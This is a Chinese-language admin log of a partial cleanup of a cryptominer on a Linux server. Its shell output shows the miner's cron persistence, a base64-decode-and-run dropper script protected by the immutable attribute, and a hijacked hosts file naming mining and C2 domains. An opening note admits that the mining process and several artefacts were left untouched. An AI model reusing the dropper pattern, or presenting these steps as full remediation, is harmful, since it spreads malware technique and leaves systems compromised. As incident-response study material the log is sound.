记录一次挖矿病毒删除过程

注：下面的日志只清理了 root 的 crontab、/root/.bffbe、/opt/bffbe、/etc/cron.d/0bffbe 以及 /etc/hosts 中的劫持条目；日志中占用 597% CPU 的进程 8092 (MWV7Gk) 并没有被终止，/root/.systemd-login 仍带有 i 属性，/etc 下与 hosts 同一时间（Mar 2 14:50）生成的 cfly、httpdz、migrations、cron.d/tomcat 和 /lib32 也未做检查，因此这次处理尚不能确认持久化已被彻底清除，后续仍需逐项排查。

[root@DIST /]# top

top - 21:24:35 up 59 days,  3:13,  2 users,  load average: 7.39, 7.40, 7.34
Tasks: 200 total,   2 running, 198 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.5 us,  0.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.2 si,  0.0 st
KiB Mem : 16268024 total,  1557392 free,  7288868 used,  7421764 buff/cache
KiB Swap:  1679356 total,  1672956 free,     6400 used.  7746200 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                  
 8092 root      20   0 2444864   3380      4 S 597.0  0.0   2206:14 MWV7Gk                                   
27473 root      20   0 8997140 891104  11104 S   2.7  5.5 361:48.38 java                                     
  794 root      20   0  317100  19592   4336 S   0.3  0.1  34:31.64 vmtoolsd                                 
12492 root      20   0  137060   7820   1248 S   0.3  0.0  42:24.92 redis-server                             
    1 root      20   0  190924   3304   2200 S   0.0  0.0  10:52.63 systemd                                  
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.38 kthreadd                                 
    3 root      20   0       0      0      0 S   0.0  0.0   1:46.13 ksoftirqd/0                              
    5 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                             
    7 root      rt   0       0      0      0 S   0.0  0.0   0:05.55 migration/0                              
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                   
    9 root      20   0       0      0      0 R   0.0  0.0  41:17.35 rcu_sched                                
   10 root      rt   0       0      0      0 S   0.0  0.0   0:47.52 watchdog/0                               
   11 root      rt   0       0      0      0 S   0.0  0.0   0:59.00 watchdog/1                               
   12 root      rt   0       0      0      0 S   0.0  0.0   0:12.19 migration/1                              
   13 root      20   0       0      0      0 S   0.0  0.0  24:09.37 ksoftirqd/1                              
   15 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                             
   16 root      rt   0       0      0      0 S   0.0  0.0   1:08.07 watchdog/2                               
Fields Management for window 1:Def, whose current sort field is %CPU
   Navigate with Up/Dn, Right selects for move then <Enter> or Left commits,
   'd' or <Space> toggles display, 's' sets sort.  Use 'q' or <Esc> to end!

* PID     = Process Id             PGRP    = Process Group Id       vMj     = Major Faults delta  
* USER    = Effective User Name    TTY     = Controlling Tty        vMn     = Minor Faults delta  
* PR      = Priority               TPGID   = Tty Process Grp Id     USED    = Res+Swap Size (KiB) 
* NI      = Nice Value             SID     = Session Id             nsIPC   = IPC namespace Inode 
* VIRT    = Virtual Image (KiB)    nTH     = Number of Threads      nsMNT   = MNT namespace Inode 
* RES     = Resident Size (KiB)    P       = Last Used Cpu (SMP)    nsNET   = NET namespace Inode 
* SHR     = Shared Memory (KiB)    TIME    = CPU Time               nsPID   = PID namespace Inode 
* S       = Process Status         SWAP    = Swapped Size (KiB)     nsUSER  = USER namespace Inode
* %CPU    = CPU Usage              CODE    = Code Size (KiB)        nsUTS   = UTS namespace Inode 
* %MEM    = Memory Usage (RES)     DATA    = Data+Stack (KiB)    
* TIME+   = CPU Time, hundredths   nMaj    = Major Page Faults   
* COMMAND = Command Name/Line      nMin    = Minor Page Faults   
  PPID    = Parent Process pid     nDRT    = Dirty Pages Count   
  UID     = Effective User Id      WCHAN   = Sleeping in Function
  RUID    = Real User Id           Flags   = Task Flags 
  RUSER   = Real User Name         CGROUPS = Control Groups      
  SUID    = Saved User Id          SUPGIDS = Supp Groups IDs     
  SUSER   = Saved User Name        SUPGRPS = Supp Groups Names   
  GID     = Group Id               TGID    = Thread Group Id     
  GROUP   = Group Name             ENVIRON = Environment vars    
  
[root@DIST /]# crontab -l
33 * * * * /root/.bffbe > /dev/null 2>&1 &
[root@DIST /]# tail /etc/crontab

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

[root@DIST /]# cd /root/
[root@DIST ~]# ls
1.sh                                      openssh-7.9p1
2.sh                                      openssl-1.0.2k-12.el7.x86_64.rpm
3.sh                                      openssl-1.0.2k-16.el7_6.1.x86_64.rpm
a.gz                                      openssl-1.0.2q

[root@DIST ~]# cat .bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo 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|base64 -d|bash
[root@DIST ~]# 

[root@DIST ~]# crontab -r
[root@DIST ~]# crontab -l
no crontab for root

[root@DIST etc]# cd /root
[root@DIST ~]# rm -rf .bffbe
rm: cannot remove ‘.bffbe’: Operation not permitted
[root@DIST ~]# lsattr -a
---------------- ./.
---------------- ./..
---------------- ./.bash_logout
---------------- ./.bashrc
---------------- ./.cshrc
---------------- ./.tcshrc
---------------- ./anaconda-ks.cfg
---------------- ./.bash_history
---------------- ./2.sh
---------------- ./3.sh
---------------- ./1.sh
---------------- ./zlib-1.2.11
----i----------- ./.bffbe
---------------- ./.bashtemp
----i----------- ./.systemd-login
[root@DIST ~]# chattr -i .bffbe
[root@DIST ~]# rm -rf .bffbe 

[root@DIST ~]# ls -lt /etc | head 
total 1240
drwxr-xr-x.  2 root root     85 Mar  2 14:50 cron.d
----------   1 root root      0 Mar  2 14:50 cfly
----------   1 root root      0 Mar  2 14:50 httpdz
----------   1 root root      0 Mar  2 14:50 migrations
-rw-r--r--   1 root root   1296 Mar  2 14:50 hosts
----------   1 root root    826 Mar  1 21:39 shadow
-rw-r--r--   1 root root     53 Feb 25 01:35 resolv.conf
-rw-r--r--   1 root root  37897 Feb 24 03:47 ld.so.cache
drwxr-xr-x.  2 root root     23 Feb  6 03:56 cron.daily

[root@DIST ~]# cd /etc
[root@DIST etc]# lsattr hosts
----i----------- hosts
[root@DIST etc]# chattr -i hosts
[root@DIST etc]# vi hosts
[root@DIST etc]# cat /etc/hosts
0.0.0.0		Rainbow66.f3322.net
0.0.0.0		rapid7cpfqnwxodo.tor2web.fyi
0.0.0.0		aptgetgxqs3secda.onion.ly
0.0.0.0		intelbagjop7nzm5.onion.glass
127.0.0.1		localhost
0.0.0.0		systemten.org
0.0.0.0		rapid7cpfqnwxodo.onion.ly
0.0.0.0		upir.ir

0.0.0.0		tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.sh


0.0.0.0		pm.cpuminerpool.com
0.0.0.0		gitee.com

0.0.0.0		intelbagjop7nzm5.onion.mn
0.0.0.0		w.21-3n.xyz
0.0.0.0		aptgetgxqs3secda.onion.pet
0.0.0.0		lsd.systemten.org
0.0.0.0		timesync.su
0.0.0.0		aptgetgxqs3secda.onion.in.net
0.0.0.0		intelbagjop7nzm5.tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.to
0.0.0.0		aptgetgxqs3secda.tor2web.fyi
0.0.0.0		an7kmd2wp4xo7hpr.onion.sh
0.0.0.0		an7kmd2wp4xo7hpr.d2web.org

0.0.0.0		rapid7cpfqnwxodo.onion.pet
0.0.0.0		an7kmd2wp4xo7hpr.tor2web.su

0.0.0.0		lsdu.b-cdn.net

0.0.0.0		an7kmd2wp4xo7hpr.timesync.su
0.0.0.0		img.sobot.com
0.0.0.0		rainbow20.eatuo.com
0.0.0.0		w.3ei.xyz
0.0.0.0		rapid7cpfqnwxodo.onion.in.net
0.0.0.0		aliyun.one

0.0.0.0		intelbagjop7nzm5.d2web.org
0.0.0.0		thyrsi.com
0.0.0.0		pastebin.com

0.0.0.0		intelbagjop7nzm5.onion.in.net

[root@DIST /]# ll
total 28
drwxr-xr-x    3 root root   25 Jul 23  2019 backup
lrwxrwxrwx.   1 root root    7 Dec 18  2018 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Jun 24  2019 boot
drwxr-xr-x    3 root root   18 Jun  3  2019 data
drwxr-xr-x   20 root root 3220 Jan  3 17:58 dev
drwxr-xr-x.  87 root root 8192 Mar  2 22:12 etc
drwxr-xr-x.   2 root root    6 Nov  5  2016 home
lrwxrwxrwx.   1 root root    7 Dec 18  2018 lib -> usr/lib
drwxr-xr-x    2 root root   59 Mar  2 14:50 lib32
lrwxrwxrwx.   1 root root    9 Dec 18  2018 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Nov  5  2016 media
drwxr-xr-x.   2 root root    6 Nov  5  2016 mnt
drwxr-xr-x.   6 root root  124 Mar  2 00:13 opt
dr-xr-xr-x  210 root root    0 Jan  3 17:58 proc
dr-xr-x---.  22 root root 4096 Mar  2 22:14 root
drwxr-xr-x   25 root root  740 Feb 25 01:35 run
lrwxrwxrwx.   1 root root    8 Dec 18  2018 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Nov  5  2016 srv
dr-xr-xr-x   13 root root    0 Jan  3 17:58 sys
d---------.  13 root root 4096 Mar  1 00:02 tmp
drwxr-xr-x    3 root root   23 Nov 11 15:32 Users
drwxr-xr-x.  14 root root  167 Jun  4  2019 usr
drwxr-xr-x.  19 root root  267 Jun 24  2019 var
-rw-r--r--    1 root root    4 Oct 21 16:34 zookeeper_server.pid
[root@DIST /]# chmod 755 tmp

[root@DIST tmp]# cd /etc
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# ll
total 12
-rw-r--r--  1 root root  46 Nov 20  2015 0bffbe
-rw-r--r--. 1 root root 128 Mar 31  2016 0hourly
-rw-r--r--  1 root root  71 Nov 20  2015 0qcloud-stargate-admin-start
----------  1 root root   0 Mar  2 14:50 tomcat

[root@DIST cron.d]# cat 0bffbe 
53 * * * * root /opt/bffbe > /dev/null 2>&1 &
[root@DIST cron.d]# cd /opt
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cat bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo 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|base64 -d|bash
[root@DIST opt]# lsattr
---------------- ./perfstats-to-syslog
---------------- ./qcloud-stargate-admin-start.sh
----i----------- ./bffbe
---------------- ./nu
---------------- ./yilu
---------------- ./nginx-0.12

[root@DIST opt]# rm -rf bffbe
rm: cannot remove ‘bffbe’: Operation not permitted
[root@DIST opt]# chattr -i bffbe 
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu
[root@DIST opt]# rm -rf bffbe
[root@DIST opt]# ls
nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cd /etc
[root@DIST etc]# cd /cron.d
-bash: cd: /cron.d: No such file or directory
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# lsattr 
---------------- ./0hourly
---------------- ./0qcloud-stargate-admin-start
---------------- ./0bffbe
---------------- ./tomcat
[root@DIST cron.d]# rm 0rf 0bffbe
rm: cannot remove ‘0rf’: No such file or directory
rm: remove regular file ‘0bffbe’? y
